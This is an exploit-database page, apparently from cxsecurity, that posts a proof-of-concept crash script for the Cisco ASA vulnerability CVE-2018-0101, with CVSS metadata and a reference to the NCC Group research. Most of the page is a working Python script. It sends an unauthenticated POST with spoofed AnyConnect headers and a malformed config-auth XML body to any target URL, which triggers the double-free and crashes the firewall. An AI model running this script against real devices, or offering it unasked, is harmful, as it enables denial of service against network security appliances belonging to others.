Cisco ASA Crash Proof Of Concept

2018.02.08
Credit: Multiple
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-415


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

# # Cisco ASA CVE-2018-0101 Crash PoC # # We basically just read: # https://www.nccgroup.trust/globalassets/newsroom/uk/events/2018/02/reconbrx2018-robin-hood-vs-cisco-asa.pdf # # @zerosum0x0, @jennamagius, @aleph___naught # import requests, sys headers = {} headers['User-Agent'] = 'Open AnyConnect VPN Agent v7.08-265-gae481214-dirty' headers['Content-Type'] = 'application/x-www-form-urlencoded' headers['X-Aggregate-Auth'] = '1' headers['X-Transcend-Version'] = '1' headers['Accept-Encoding'] = 'identity' headers['Accept'] = '*/*' headers['X-AnyConnect-Platform'] = 'linux-64' headers['X-Support-HTTP-Auth'] = 'false' headers['X-Pad'] = '0000000000000000000000000000000000000000' xml = """<?xml version="1.0" encoding="UTF-8"?> <config-auth client="a" type="a" aggregate-auth-version="a"> <host-scan-reply>A</host-scan-reply> </config-auth> """ r = requests.post(sys.argv[1], data = xml, headers = headers, verify=False, allow_redirects=False) print(r.status_code) print(r.headers) print(r.text)

References:

https://www.nccgroup.trust/globalassets/newsroom/uk/events/2018/02/reconbrx2018-robin-hood-vs-cisco-asa.pdf


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top